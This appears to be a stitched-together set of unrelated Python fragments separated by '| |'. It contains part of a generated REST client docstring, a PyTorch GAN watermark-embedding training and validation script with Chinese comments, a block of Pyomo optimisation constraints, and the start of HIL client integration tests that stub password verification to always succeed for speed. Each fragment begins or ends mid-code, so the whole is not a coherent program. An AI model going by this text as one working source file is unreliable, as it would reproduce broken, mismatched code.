(connection, read) timeouts.
:return: V1OrganizationMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.get_organization_member_with_http_info(
owner, user, **kwargs
) # noqa: E501
def get_organization_member_with_http_info(
self, owner, user, **kwargs
): # noqa: E501
"""Get organization member details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_organization_member_with_http_info(owner, user, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param | |
%.4f \tbatchtime: %.4f' % (
epoch, opt.niter, i, len(train_loader),
Hlosses.val, Rlosses.val, R_mselosses.val, R_consistlosses.val, Dlosses.val, FakeDlosses.val, RealDlosses.val, Ganlosses.val, Pixellosses.val, Vgglosses.val, SumLosses.val, data_time.val, batch_time.val)
if i % opt.logFrequency == 0:
print_log(log, logPath)
else:
# 只把log写入log 文件,不在控制台打印信息
print_log(log, logPath, console=False)
# #if epoch % 1 == 0 and i % opt.resultPicFrequency == 0:
# diff = 50 * (container_img - cover_imgv)
# save_result_pic(this_batch_size, cover_img_A, cover_imgv.data, container_img.data,
# secret_img, rev_secret_img.data, clean_rev_secret_img_A.data, clean_rev_secret_img_B.data, diff.data, epoch, i, opt.trainpics)
# if epoch % 1 == 0 and i % opt.resultPicFrequency == 0:
diff = 50 * (container_img - cover_imgv)
if i % opt.resultPicFrequency == 0:
with torch.no_grad():
'''
1 cover_img_A是原图(A域)
2 cover_imgv是B域的ground_truth图像b
3 container_img 是嵌入水印后的图片B'
4 secret_img是水印图像
5 rev_secret_img是从B'中提取的水印图像
6 clean_rev_secret_img_A 是从A中提取的水印图像(应为空白)
7 clean_rev_secret_img_B是从B中提取的水印图像(应为空白)
8 diff 是嵌入水印后的图像B'和不嵌入水印的图像的diff
排列为:
A、ground-truth B、B'、 diff(B-B')、clean_A_watermark、clean_B_watermark、B' watermark、ground truth watermark
'''
save_result_pic(cover_img_A, cover_img_B, container_img, diff, clean_rev_secret_img_A, clean_rev_secret_img_B, rev_secret_img, secret_img, epoch, i, trainpicsDir)
# save_result_pic(this_batch_size, cover_img_A, cover_imgv, container_img,
# secret_img, rev_secret_img, clean_rev_secret_img_A, clean_rev_secret_img_B, diff, epoch, i, opt.trainpics)
epoch_log = "one epoch time is %.4f======================================================================" % (
batch_time.sum) + "\n"
epoch_log = epoch_log + "epoch learning rate: optimizerH_lr = %.8f optimizerR_lr = %.8f optimizerD_lr = %.8f" % (
optimizerH.param_groups[0]['lr'], optimizerR.param_groups[0]['lr'], optimizerD.param_groups[0]['lr']) + "\n"
epoch_log = epoch_log + "epoch_Hloss=%.6f\tepoch_Rloss=%.6f\tepoch_R_mseloss=%.6f\tepoch_R_consistloss=%.6f\tepoch_Dloss=%.6f\tepoch_FakeDloss=%.6f\tepoch_RealDloss=%.6f\tepoch_GanLoss=%.6fepoch_Pixelloss=%.6f\tepoch_Vggloss=%.6f\tepoch_sumLoss=%.6f" % (
Hlosses.avg, Rlosses.avg, R_mselosses.avg, R_consistlosses.avg, Dlosses.avg, FakeDlosses.avg, RealDlosses.avg, Ganlosses.avg, Pixellosses.avg, Vgglosses.avg, SumLosses.avg)
print_log(epoch_log, logPath)
writer.add_scalar("lr/H_lr", optimizerH.param_groups[0]['lr'], epoch)
writer.add_scalar("lr/R_lr", optimizerR.param_groups[0]['lr'], epoch)
writer.add_scalar("lr/D_lr", optimizerD.param_groups[0]['lr'], epoch)
writer.add_scalar("lr/beta", opt.beta, epoch)
writer.add_scalar('train/R_loss', Rlosses.avg, epoch)
writer.add_scalar('train/R_mse_loss', R_mselosses.avg, epoch)
writer.add_scalar('train/R_consist_loss', R_consistlosses.avg, epoch)
writer.add_scalar('train/H_loss', Hlosses.avg, epoch)
writer.add_scalar('train/D_loss', Dlosses.avg, epoch)
writer.add_scalar('train/FakeD_loss', FakeDlosses.avg, epoch)
writer.add_scalar('train/RealD_loss', RealDlosses.avg, epoch)
writer.add_scalar('train/Gan_loss', Ganlosses.avg, epoch)
writer.add_scalar('train/Pixel_loss', Pixellosses.avg, epoch)
writer.add_scalar('train/Vgg_loss', Vgglosses.avg, epoch)
writer.add_scalar('train/sum_loss', SumLosses.avg, epoch)
def validation(val_loader, epoch, Hnet, Rnet, Dnet, validpicsDir):
print(
"#################################################### validation begin ########################################################")
start_time = time.time()
Hnet.eval()
Rnet.eval()
Dnet.eval()
Hlosses = AverageMeter()
Rlosses = AverageMeter()
R_mselosses = AverageMeter()
R_consistlosses = AverageMeter()
Dlosses = AverageMeter()
FakeDlosses = AverageMeter()
RealDlosses = AverageMeter()
Ganlosses = AverageMeter()
Pixellosses = AverageMeter()
Vgglosses = AverageMeter()
# Tensor type
Tensor = torch.cuda.FloatTensor
with torch.no_grad():
loader = transforms.Compose(
[ # trans.Grayscale(num_output_channels=1),
transforms.ToTensor(), ])
clean_img = Image.open(os.path.join(root, "secret/clean.png"))
#clean_img = Image.open("../secret/clean.png")
clean_img=loader(clean_img)
#secret_img = Image.open("../secret/flower.png")
secret_img=Image.open(os.path.join(
root, "secret/flower.png"))
secret_img=loader(secret_img)
for i, data in tqdm(enumerate(val_loader, 0)):
Hnet.zero_grad()
Rnet.zero_grad()
Dnet.zero_grad()
this_batch_size=int(data.size()[0])
cover_img=data[0:this_batch_size, :, :, :]
cover_img_A=cover_img[:, :, 0:256, 0:256]
cover_img_B=cover_img[:, :, 0:256, 256:512]
secret_img=secret_img.repeat(this_batch_size, 1, 1, 1)
secret_img=secret_img[0:this_batch_size, :, :, :]
clean_img=clean_img.repeat(this_batch_size, 1, 1, 1)
clean_img=clean_img[0:this_batch_size, :, :, :]
if opt.cuda:
cover_img=cover_img.cuda()
cover_img_A=cover_img_A.cuda()
cover_img_B=cover_img_B.cuda()
secret_img=secret_img.cuda()
clean_img=clean_img.cuda()
concat_img=torch.cat([cover_img_B, secret_img], dim = 1)
concat_imgv=Variable(concat_img)
cover_imgv=Variable(cover_img_B)
container_img=Hnet(concat_imgv)
A_imgv=Variable(cover_img_A)
# Adversarial ground truths
pred_fake=Dnet(container_img)
valid=Variable(
Tensor(np.ones((cover_imgv.size(0), pred_fake.size(1), pred_fake.size(2), pred_fake.size(3)))), requires_grad = False)
fake=Variable(
Tensor(np.zeros((cover_imgv.size(0), pred_fake.size(1), pred_fake.size(2), pred_fake.size(3)))), requires_grad = False)
#print(f'pred fake size:{pred_fake.size()}')
#print(f'valid size:{valid.size()}')
gan_loss=criterion_GAN(pred_fake, valid)
pixel_loss=criterion_pixelwise(container_img, cover_imgv)
#container_img_rgb = container_img.repeat(1, 3, 1, 1)
#cover_imgv_rgb = cover_imgv.repeat(1, 3, 1, 1)
#cover_imgv_rgb.detach()
vgg_loss=mse_loss(vgg(container_img).relu2_2,
vgg(cover_imgv).relu2_2)
errH=opt.betamse * mse_loss(container_img, cover_imgv) + opt.betagans * gan_loss + opt.betapix * pixel_loss + opt.betavgg * vgg_loss
# Train Discriminator
# Real loss
pred_real=Dnet(cover_imgv)
loss_real=criterion_GAN(pred_real, valid)
# Fake loss
pred_fake=Dnet(container_img.detach())
loss_fake=criterion_GAN(pred_fake, fake)
# Total loss
errD=10000 * 0.5 * (loss_real + loss_fake)
rev_secret_img=Rnet(container_img)
secret_imgv=Variable(secret_img)
errR_mse=opt.betamse * mse_loss(rev_secret_img, secret_imgv)
clean_rev_secret_img_A=Rnet(A_imgv)
clean_imgv=Variable(clean_img)
errR_clean_A=opt.betamse * \
mse_loss(clean_rev_secret_img_A, clean_imgv)
clean_rev_secret_img_B=Rnet(cover_imgv)
clean_imgv=Variable(clean_img)
errR_clean_B=opt.betamse * \
mse_loss(clean_rev_secret_img_B, clean_imgv)
errR_clean=opt.betacleanA * errR_clean_A + opt.betacleanB * errR_clean_B
half_batchsize=int(this_batch_size / 2)
errR_consist=opt.betamse * \
mse_loss(rev_secret_img[0:half_batchsize, :, :, :],
rev_secret_img[half_batchsize:half_batchsize * 2, :, :, :])
errR = errR_mse + opt.betacons * errR_consist + opt.betaclean * errR_clean
betaerrR_secret = opt.beta * errR
err_sum = errH + betaerrR_secret
Hlosses.update(errH.data, this_batch_size)
Rlosses.update(errR.data, this_batch_size)
R_mselosses.update(errR_mse.data, this_batch_size)
R_consistlosses.update(errR_consist.data, this_batch_size)
Dlosses.update(errD.data, this_batch_size)
FakeDlosses.update(loss_fake.data, this_batch_size)
RealDlosses.update(loss_real.data, this_batch_size)
Ganlosses.update(gan_loss.data, this_batch_size)
Pixellosses.update(pixel_loss.data, this_batch_size)
Vgglosses.update(vgg_loss.data, this_batch_size)
if i % 1000 == 0:
diff = 50 * (container_img - cover_imgv)
with torch.no_grad():
# image_tensor = torch.cat([cover_img_A, cover_img_B, container_img, diff, clean_rev_secret_img_A, clean_rev_secret_img_B, rev_secret_img, secret_img], axis=0)
save_result_pic(cover_img_A, cover_img_B, container_img, diff, clean_rev_secret_img_A, clean_rev_secret_img_B, rev_secret_img, secret_img, epoch, i , validpicsDir)
val_hloss = Hlosses.avg
val_rloss = Rlosses.avg
val_r_mseloss = R_mselosses.avg
val_r_consistloss = R_consistlosses.avg
val_dloss = Dlosses.avg
val_fakedloss = FakeDlosses.avg
val_realdloss = RealDlosses.avg
val_Ganlosses = Ganlosses.avg
val_Pixellosses = Pixellosses.avg
val_Vgglosses = Vgglosses.avg
val_sumloss = val_hloss + opt.beta * val_rloss
val_time = time.time() - start_time
val_log = "validation[%d] val_Hloss = %.6f\t val_Rloss = %.6f\t val_R_mseloss = %.6f\t val_R_consistloss = %.6f\t val_Dloss = %.6f\t val_FakeDloss = %.6f\t val_RealDloss = %.6f\t val_Ganlosses = %.6f\t val_Pixellosses = %.6f\t val_Vgglosses = %.6f\t val_Sumloss = %.6f\t validation time=%.2f" % (
epoch, val_hloss, val_rloss, val_r_mseloss, val_r_consistloss, val_dloss, val_fakedloss, val_realdloss, val_Ganlosses, val_Pixellosses, val_Vgglosses, val_sumloss, val_time)
print_log(val_log, logPath)
writer.add_scalar('validation/H_loss_avg', Hlosses.avg, epoch)
writer.add_scalar('validation/R_loss_avg', Rlosses.avg, epoch)
writer.add_scalar('validation/R_mse_loss', R_mselosses.avg, epoch)
writer.add_scalar('validation/R_consist_loss', R_consistlosses.avg, epoch)
writer.add_scalar('validation/D_loss_avg', Dlosses.avg, epoch)
writer.add_scalar('validation/FakeD_loss_avg', FakeDlosses.avg, epoch)
writer.add_scalar('validation/RealD_loss_avg', RealDlosses.avg, epoch)
writer.add_scalar('validation/Gan_loss_avg', val_Ganlosses, epoch)
writer.add_scalar('validation/Pixel_loss_avg', val_Pixellosses, epoch)
writer.add_scalar('validation/Vgg_loss_avg', val_Vgglosses, epoch)
writer.add_scalar('validation/sum_loss_avg', val_sumloss, epoch)
print("#################################################### validation end ########################################################")
# return val_hloss, val_rloss, val_r_mseloss, val_r_consistloss, val_dloss, val_fakedloss, val_realdloss, val_Ganlosses, val_Pixellosses, vgg_loss, val_sumloss
return val_hloss, val_rloss, val_r_mseloss, val_r_consistloss, val_dloss, val_fakedloss, val_realdloss, val_Ganlosses, val_Pixellosses, val_Vgglosses, val_sumloss
def test(test_loader, Hnet, Rnet, testpicsDir):
print(
"#################################################### test begin ########################################################")
start_time = time.time()
Hnet.eval()
Rnet.eval()
# Tensor type
Tensor = torch.cuda.FloatTensor
# if opt.cuda:
# Hnet = Hnet.cuda()
# Rnet = Rnet.cuda()
# print_network(Hnet)
with torch.no_grad():
loader = transforms.Compose(
[#trans.Grayscale(num_output_channels=1),
transforms.ToTensor(), ])
clean_img = Image.open(os.path.join(root, "secret/clean.png"))
#clean_img = Image.open("../secret/clean.png")
clean_img = loader(clean_img)
#secret_img = Image.open("../secret/flower.png")
secret_img = Image.open(os.path.join(
root, "secret/flower.png"))
secret_img = loader(secret_img)
for i, data in enumerate(test_loader, 0):
Hnet.zero_grad()
Rnet.zero_grad()
this_batch_size = int(data.size()[0])
cover_img = data[0:this_batch_size, :, :, :]
cover_img_A = cover_img[:, :, 0:256, 0:256]
cover_img_B = cover_img[:, :, 0:256, 256:512]
secret_img = secret_img.repeat(this_batch_size, 1, 1, 1)
secret_img = secret_img[0:this_batch_size, :, :, :]
clean_img = clean_img.repeat(this_batch_size, 1, 1, 1)
clean_img = clean_img[0:this_batch_size, :, :, :]
if opt.cuda:
cover_img = cover_img.cuda()
cover_img_A = cover_img_A.cuda()
cover_img_B = cover_img_B.cuda()
secret_img = secret_img.cuda()
clean_img = clean_img.cuda()
concat_img = torch.cat([cover_img_B, secret_img], dim=1)
concat_imgv = Variable(concat_img)
cover_imgv = Variable(cover_img_B)
# container_img带有水印的灰度图像
container_img = Hnet(concat_imgv)
A_imgv = Variable(cover_img_A)
# container_img的3通道形式的图像
#container_img_rgb = container_img.repeat(1, 1, 1, 1)
# B的3通道形式的图像
#cover_imgv_rgb = cover_imgv.repeat(1, 1, 1, 1)
#cover_imgv_rgb.detach()
# rev_secret_img 恢复出来的水印
rev_secret_img = Rnet(container_img)
#rev_secret_img_rgb = rev_secret_img.repeat(1, 1, 1, 1)
secret_imgv = Variable(secret_img)
# 从A和B中恢复出来的水印
clean_rev_secret_img_A = Rnet(A_imgv)
clean_rev_secret_img_B = Rnet(cover_imgv)
# if i % 1000 == 0:
diff = 50 * (container_img - cover_imgv)
with torch.no_grad():
# image_tensor = torch.cat([cover_img_A, cover_img_B, container_img, diff, clean_rev_secret_img_A, clean_rev_secret_img_B, rev_secret_img, secret_img], axis=0)
save_result_pic(cover_img_A, cover_img_B, container_img, diff, clean_rev_secret_img_A, clean_rev_secret_img_B, rev_secret_img, secret_img, 'test', i , testpicsDir)
print("#################################################### test end ########################################################")
# custom weights initialization called on netG and netD
def weights_init(m):
# 获取模型名称
classname = m.__class__.__name__
# m.__class__.__name__为:Conv2d 、 LeakyReLU等内容
# print(classname)
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
# print the structure and parameters number of the net
def print_network(net):
num_params = 0
for param in net.parameters():
num_params += param.numel()
print_log(str(net), logPath)
print_log('Total number of parameters: %d' % num_params, logPath)
# 给代码进行备份
def save_current_codes(des_path):
# 获取当前文件的绝对路径(包含该py文件名)
main_file_path = os.path.realpath(__file__)
# 将绝对路径拆分为绝对路径文件夹、py名字
cur_work_dir, mainfile = os.path.split(main_file_path)
new_main_path = os.path.join(des_path, mainfile)
# 将当前文件代码保存到new_main_path中
shutil.copyfile(main_file_path, new_main_path)
data_dir = cur_work_dir + "/data/"
new_data_dir_path = des_path + "/data/"
shutil.copytree(data_dir, new_data_dir_path)
model_dir = cur_work_dir + "/models/"
new_model_dir_path = des_path + "/models/"
shutil.copytree(model_dir, new_model_dir_path)
utils_dir = cur_work_dir + "/utils/"
new_utils_dir_path = des_path + "/utils/"
shutil.copytree(utils_dir, new_utils_dir_path)
# print the training log and save into logFiles
# 该函数作用是把log_info写入log_path指向的文件中
def print_log(log_info, log_path, console=True):
# print the info into the console
if console:
print(log_info)
# debug mode don't write the log into files
if not opt.debug:
# write the log into log file
if not os.path.exists(log_path):
fp = open(log_path, "w")
fp.writelines(log_info + "\n")
else:
with open(log_path, 'a+') as f:
f.writelines(log_info + '\n')
# save result pic and the coverImg filePath and the secretImg filePath
def save_result_pic(cover_img_A, cover_img_B, container_img, diff, clean_rev_secret_img_A, clean_rev_secret_img_B, rev_secret_img, secret_img, epoch, i, save_path):
this_batch_size = cover_img_A.size(0)
originalFramesA = cover_img_A.reshape(
this_batch_size, 3, opt.imageSize, opt.imageSize)
originalFramesB = cover_img_B.reshape(
this_batch_size, 3, opt.imageSize, opt.imageSize)
container_allFrames = container_img.reshape(
this_batch_size, 3, opt.imageSize, opt.imageSize)
secretFrames = secret_img.reshape(
this_batch_size, 3, opt.imageSize, opt.imageSize)
revSecFrames = rev_secret_img.reshape(
this_batch_size, 3, opt.imageSize, opt.imageSize)
revCleanFramesA = clean_rev_secret_img_A.reshape(
this_batch_size, 3, opt.imageSize, opt.imageSize)
revCleanFramesB = clean_rev_secret_img_B.reshape(
this_batch_size, 3, opt.imageSize, opt.imageSize)
showResult = torch.cat([originalFramesA, originalFramesB, container_allFrames, diff, revCleanFramesA, revCleanFramesB, revSecFrames,
secretFrames, ], 0)
resultImgName = '%s/ResultPics_epoch%s_batch%s.png' % (
save_path, epoch, i)
vutils.save_image(showResult, resultImgName,
nrow=this_batch_size, padding=1, normalize=False)
class AverageMeter(object):
"""
Computes and stores the average and current value.
"""
| |
m.x852 <= 1106.777870451)
m.c748 = Constraint(expr= 1106.777870451*m.b61 + m.x156 - m.x853 <= 1106.777870451)
m.c749 = Constraint(expr= 1106.777870451*m.b62 + m.x158 - m.x848 <= 1106.777870451)
m.c750 = Constraint(expr= 1106.777870451*m.b63 + m.x160 - m.x849 <= 1106.777870451)
m.c751 = Constraint(expr= 1106.777870451*m.b64 + m.x162 - m.x850 <= 1106.777870451)
m.c752 = Constraint(expr= 1106.777870451*m.b65 + m.x164 - m.x851 <= 1106.777870451)
m.c753 = Constraint(expr= 1106.777870451*m.b66 + m.x166 - m.x852 <= 1106.777870451)
m.c754 = Constraint(expr= 1106.777870451*m.b67 + m.x168 - m.x853 <= 1106.777870451)
m.c755 = Constraint(expr= 1106.777870452*m.b68 + m.x170 - m.x848 <= 1106.777870452)
m.c756 = Constraint(expr= 1106.777870452*m.b69 + m.x172 - m.x849 <= 1106.777870452)
m.c757 = Constraint(expr= 1106.777870452*m.b70 + m.x174 - m.x850 <= 1106.777870452)
m.c758 = Constraint(expr= 1106.777870452*m.b71 + m.x176 - m.x851 <= 1106.777870452)
m.c759 = Constraint(expr= 1106.777870452*m.b72 + m.x178 - m.x852 <= 1106.777870452)
m.c760 = Constraint(expr= 1106.777870452*m.b73 + m.x180 - m.x853 <= 1106.777870452)
m.c761 = Constraint(expr= m.b2 - m.b3 + m.x854 >= 0)
m.c762 = Constraint(expr= m.b3 - m.b4 + m.x855 >= 0)
m.c763 = Constraint(expr= m.b4 - m.b5 + m.x856 >= 0)
m.c764 = Constraint(expr= m.b5 - m.b6 + m.x857 >= 0)
m.c765 = Constraint(expr= m.b6 - m.b7 + m.x858 >= 0)
m.c766 = Constraint(expr= m.b8 - m.b9 + m.x859 >= 0)
m.c767 = Constraint(expr= m.b9 - m.b10 + m.x860 >= 0)
m.c768 = Constraint(expr= m.b10 - m.b11 + m.x861 >= 0)
m.c769 = Constraint(expr= m.b11 - m.b12 + m.x862 >= 0)
m.c770 = Constraint(expr= m.b12 - m.b13 + m.x863 >= 0)
m.c771 = Constraint(expr= m.b14 - m.b15 + m.x864 >= 0)
m.c772 = Constraint(expr= m.b15 - m.b16 + m.x865 >= 0)
m.c773 = Constraint(expr= m.b16 - m.b17 + m.x866 >= 0)
m.c774 = Constraint(expr= m.b17 - m.b18 + m.x867 >= 0)
m.c775 = Constraint(expr= m.b18 - m.b19 + m.x868 >= 0)
m.c776 = Constraint(expr= m.b20 - m.b21 + m.x869 >= 0)
m.c777 = Constraint(expr= m.b21 - m.b22 + m.x870 >= 0)
m.c778 = Constraint(expr= m.b22 - m.b23 + m.x871 >= 0)
m.c779 = Constraint(expr= m.b23 - m.b24 + m.x872 >= 0)
m.c780 = Constraint(expr= m.b24 - m.b25 + m.x873 >= 0)
m.c781 = Constraint(expr= m.b26 - m.b27 + m.x874 >= 0)
m.c782 = Constraint(expr= m.b27 - m.b28 + m.x875 >= 0)
m.c783 = Constraint(expr= m.b28 - m.b29 + m.x876 >= 0)
m.c784 = Constraint(expr= m.b29 - m.b30 + m.x877 >= 0)
m.c785 = Constraint(expr= m.b30 - m.b31 + m.x878 >= 0)
m.c786 = Constraint(expr= m.b32 - m.b33 + m.x879 >= 0)
m.c787 = Constraint(expr= m.b33 - m.b34 + m.x880 >= 0)
m.c788 = Constraint(expr= m.b34 - m.b35 + m.x881 >= 0)
m.c789 = Constraint(expr= m.b35 - m.b36 + m.x882 >= 0)
m.c790 = Constraint(expr= m.b36 - m.b37 + m.x883 >= 0)
m.c791 = Constraint(expr= m.b38 - m.b39 + m.x884 >= 0)
m.c792 = Constraint(expr= m.b39 - m.b40 + m.x885 >= 0)
m.c793 = Constraint(expr= m.b40 - m.b41 + m.x886 >= 0)
m.c794 = Constraint(expr= m.b41 - m.b42 + m.x887 >= 0)
m.c795 = Constraint(expr= m.b42 - m.b43 + m.x888 >= 0)
m.c796 = Constraint(expr= m.b44 - m.b45 + m.x889 >= 0)
m.c797 = Constraint(expr= m.b45 - m.b46 + m.x890 >= 0)
m.c798 = Constraint(expr= m.b46 - m.b47 + m.x891 >= 0)
m.c799 = Constraint(expr= m.b47 - m.b48 + m.x892 >= 0)
m.c800 = Constraint(expr= m.b48 - m.b49 + m.x893 >= 0)
m.c801 = Constraint(expr= m.b50 - m.b51 + m.x894 >= 0)
m.c802 = Constraint(expr= m.b51 - m.b52 + m.x895 >= 0)
m.c803 = Constraint(expr= m.b52 - m.b53 + m.x896 >= 0)
m.c804 = Constraint(expr= m.b53 - m.b54 + m.x897 >= 0)
m.c805 = Constraint(expr= m.b54 - m.b55 + m.x898 >= 0)
m.c806 = Constraint(expr= m.b56 - m.b57 + m.x899 >= 0)
m.c807 = Constraint(expr= m.b57 - m.b58 + m.x900 >= 0)
m.c808 = Constraint(expr= m.b58 - m.b59 + m.x901 >= 0)
m.c809 = Constraint(expr= m.b59 - m.b60 + m.x902 >= 0)
m.c810 = Constraint(expr= m.b60 - m.b61 + m.x903 >= 0)
m.c811 = Constraint(expr= m.b62 - m.b63 + m.x904 >= 0)
m.c812 = Constraint(expr= m.b63 - m.b64 + m.x905 >= 0)
m.c813 = Constraint(expr= m.b64 - m.b65 + m.x906 >= 0)
m.c814 = Constraint(expr= m.b65 - m.b66 + m.x907 >= 0)
m.c815 = Constraint(expr= m.b66 - m.b67 + m.x908 >= 0)
m.c816 = Constraint(expr= m.b68 - m.b69 + m.x909 >= 0)
m.c817 = Constraint(expr= m.b69 - m.b70 + m.x910 >= 0)
m.c818 = Constraint(expr= m.b70 - m.b71 + m.x911 >= 0)
m.c819 = Constraint(expr= m.b71 - m.b72 + m.x912 >= 0)
m.c820 = Constraint(expr= m.b72 - m.b73 + m.x913 >= 0)
m.c821 = Constraint(expr= - m.b2 + m.b3 + m.x854 >= 0)
m.c822 = Constraint(expr= - m.b3 + m.b4 + m.x855 >= 0)
m.c823 = Constraint(expr= - m.b4 + m.b5 + m.x856 >= 0)
m.c824 = Constraint(expr= - m.b5 + m.b6 + m.x857 >= 0)
m.c825 = Constraint(expr= - m.b6 + m.b7 + m.x858 >= 0)
m.c826 = Constraint(expr= - m.b8 + m.b9 + m.x859 >= 0)
m.c827 = Constraint(expr= - m.b9 + m.b10 + m.x860 >= 0)
m.c828 = Constraint(expr= - m.b10 + m.b11 + m.x861 >= 0)
m.c829 = Constraint(expr= - m.b11 + m.b12 + m.x862 >= 0)
m.c830 = Constraint(expr= - m.b12 + m.b13 + m.x863 >= 0)
m.c831 = Constraint(expr= - m.b14 + m.b15 + m.x864 >= 0)
m.c832 = Constraint(expr= - m.b15 + m.b16 + m.x865 >= 0)
m.c833 = Constraint(expr= - m.b16 + m.b17 + m.x866 >= 0)
m.c834 = Constraint(expr= - m.b17 + m.b18 + m.x867 >= 0)
m.c835 = Constraint(expr= - m.b18 + m.b19 + m.x868 >= 0)
m.c836 = Constraint(expr= - m.b20 + m.b21 + m.x869 >= 0)
m.c837 = Constraint(expr= - m.b21 + m.b22 + m.x870 >= 0)
m.c838 = Constraint(expr= - m.b22 + m.b23 + m.x871 >= 0)
m.c839 = Constraint(expr= - m.b23 + m.b24 + m.x872 >= 0)
m.c840 = Constraint(expr= - m.b24 + m.b25 + m.x873 >= 0)
m.c841 = Constraint(expr= - m.b26 + m.b27 + m.x874 >= 0)
m.c842 = Constraint(expr= - m.b27 + m.b28 + m.x875 >= 0)
m.c843 = Constraint(expr= - m.b28 + m.b29 + m.x876 >= 0)
m.c844 = Constraint(expr= - m.b29 + m.b30 + m.x877 >= 0)
m.c845 = Constraint(expr= - m.b30 + m.b31 + m.x878 >= 0)
m.c846 = Constraint(expr= - m.b32 + m.b33 + m.x879 >= 0)
m.c847 = Constraint(expr= - m.b33 + m.b34 + m.x880 >= 0)
m.c848 = Constraint(expr= - m.b34 + m.b35 + m.x881 >= 0)
m.c849 = Constraint(expr= - m.b35 + m.b36 + m.x882 >= 0)
m.c850 = Constraint(expr= - m.b36 + m.b37 + m.x883 >= 0)
m.c851 = Constraint(expr= - m.b38 + m.b39 + m.x884 >= 0)
m.c852 = Constraint(expr= - m.b39 + m.b40 + m.x885 >= 0)
m.c853 = Constraint(expr= - m.b40 + m.b41 + m.x886 >= 0)
m.c854 = Constraint(expr= - m.b41 + m.b42 + m.x887 >= 0)
m.c855 = Constraint(expr= - m.b42 + m.b43 + m.x888 >= 0)
m.c856 = Constraint(expr= - m.b44 + m.b45 + m.x889 >= 0)
m.c857 = Constraint(expr= - m.b45 + m.b46 + m.x890 >= 0)
m.c858 = Constraint(expr= - m.b46 + m.b47 + m.x891 >= 0)
m.c859 = Constraint(expr= - m.b47 + m.b48 + m.x892 >= 0)
m.c860 = Constraint(expr= - m.b48 + m.b49 + m.x893 >= 0)
m.c861 = Constraint(expr= - m.b50 + m.b51 + m.x894 >= 0)
m.c862 = Constraint(expr= - m.b51 + m.b52 + m.x895 >= 0)
m.c863 = Constraint(expr= - m.b52 + m.b53 + m.x896 >= 0)
m.c864 = Constraint(expr= - m.b53 + m.b54 + m.x897 >= 0)
m.c865 = Constraint(expr= - m.b54 + m.b55 + m.x898 >= 0)
m.c866 = Constraint(expr= - m.b56 + m.b57 + m.x899 >= 0)
m.c867 = Constraint(expr= - m.b57 + m.b58 + m.x900 >= 0)
m.c868 = Constraint(expr= - m.b58 + m.b59 + m.x901 >= 0)
m.c869 = Constraint(expr= - m.b59 + m.b60 + m.x902 >= 0)
m.c870 = Constraint(expr= - m.b60 + m.b61 + m.x903 >= 0)
m.c871 = Constraint(expr= - m.b62 + m.b63 + m.x904 >= 0)
m.c872 = Constraint(expr= - m.b63 + m.b64 + m.x905 >= 0)
m.c873 = Constraint(expr= - m.b64 + m.b65 + m.x906 >= 0)
m.c874 = Constraint(expr= - m.b65 + m.b66 + m.x907 >= 0)
m.c875 = Constraint(expr= - m.b66 + m.b67 + m.x908 >= 0)
m.c876 = Constraint(expr= - m.b68 + m.b69 + m.x909 >= 0)
m.c877 = Constraint(expr= - m.b69 + m.b70 + m.x910 >= 0)
m.c878 = Constraint(expr= - m.b70 + m.b71 + m.x911 >= 0)
m.c879 = Constraint(expr= - m.b71 + m.b72 + m.x912 >= 0)
m.c880 = Constraint(expr= - m.b72 + m.b73 + m.x913 >= 0)
m.c881 = Constraint(expr= - 5*m.b74 + m.x226 <= 0)
m.c882 = Constraint(expr= - 5*m.b75 + m.x229 <= 0)
m.c883 = Constraint(expr= - 5*m.b76 | |
"""Integration tests for client library"""
from hil.flaskapp import app
from hil.client.base import ClientBase, FailedAPICallException
from hil.errors import BadArgumentError
from hil.client.client import Client
from hil.test_common import config_testsuite, config_merge, \
fresh_database, fail_on_log_warnings, server_init, uuid_pattern, \
obmd_cfg, HybridHTTPClient, initial_db
from hil.model import db
from hil import config, deferred
import json
import pytest
import requests
from passlib.hash import sha512_crypt
ep = "http://127.0.0.1:8000"
username = "hil_user"
password = "<PASSWORD>"
http_client = HybridHTTPClient(endpoint=ep,
username=username,
password=password)
C = Client(ep, http_client) # Initializing client library
fail_on_log_warnings = pytest.fixture(fail_on_log_warnings)
fresh_database = pytest.fixture(fresh_database)
server_init = pytest.fixture(server_init)
obmd_cfg = pytest.fixture(obmd_cfg)
intial_db = pytest.fixture(initial_db)
@pytest.fixture
def dummy_verify():
"""replace sha512_crypt.verify with something faster (albeit broken).
This fixture is for testing User related client calls which use database
authentication backend.
This fixture works around a serious consequence of using the database
backend: doing password hashing is **SLOW** (by design; the algorithms
are intended to make brute-forcing hard), and we've got fixtures where
we're going through the request handler tens of times for every test
(before even hitting the test itself).
So, this fixture monkey-patches sha512_crypt.verify (the function that
does the work of checking the password), replacing it with a dummy
implementation. At the time of writing, this shaves about half an hour
off of our Travis CI runs.
"""
@staticmethod
def dummy(*args, **kwargs):
"""dummy replacement, which just returns True."""
return True
old = sha512_crypt.verify
sha512_crypt.verify = dummy # override the verify() function
yield # Test runs here
sha512_crypt.verify = old # restore the old implementation.
@pytest.fixture
def configure():
"""Configure HIL"""
config_testsuite()
config_merge({
'auth': {
'require_authentication': 'False',
},
'extensions': {
'hil.ext.switches.mock': '',
'hil.ext.network_allocators.null': None,
'hil.ext.network_allocators.vlan_pool': '',
},
'hil.ext.network_allocators.vlan_pool': {
'vlans': '1001-1040',
},
'devel': {
# Disable dry_run, so we can talk to obmd. Note: We register
# several "real" switches in this module, but never actually
# preform any "real" network operations on them, so a proper
# switch setup is still not necessary.
'dry_run': None,
},
})
config.load_extensions()
@pytest.fixture
def database_authentication():
"""setup the config file for using database authentication.
This fixture is only used by Test_user class"""
config_testsuite()
config_merge({
'auth': {
'require_authentication': 'False',
},
'extensions': {
'hil.ext.auth.null': None,
'hil.ext.auth.database': '',
},
})
config.load_extensions()
@pytest.fixture()
def obmd_node(obmd_cfg):
"""register a node with both obmd & HIL
...so we can use it in tests that touch the obmd-related calls.
"""
obmd_uri = 'http://localhost' + obmd_cfg['ListenAddr'] + \
'/node/obmd-node'
# Register the node with obmd:
resp = requests.put(
obmd_uri,
auth=('admin', obmd_cfg['AdminToken']),
data=json.dumps({
'type': 'mock',
'info': {
"addr": "10.0.0.23",
"NumWrites": 0,
},
}),
)
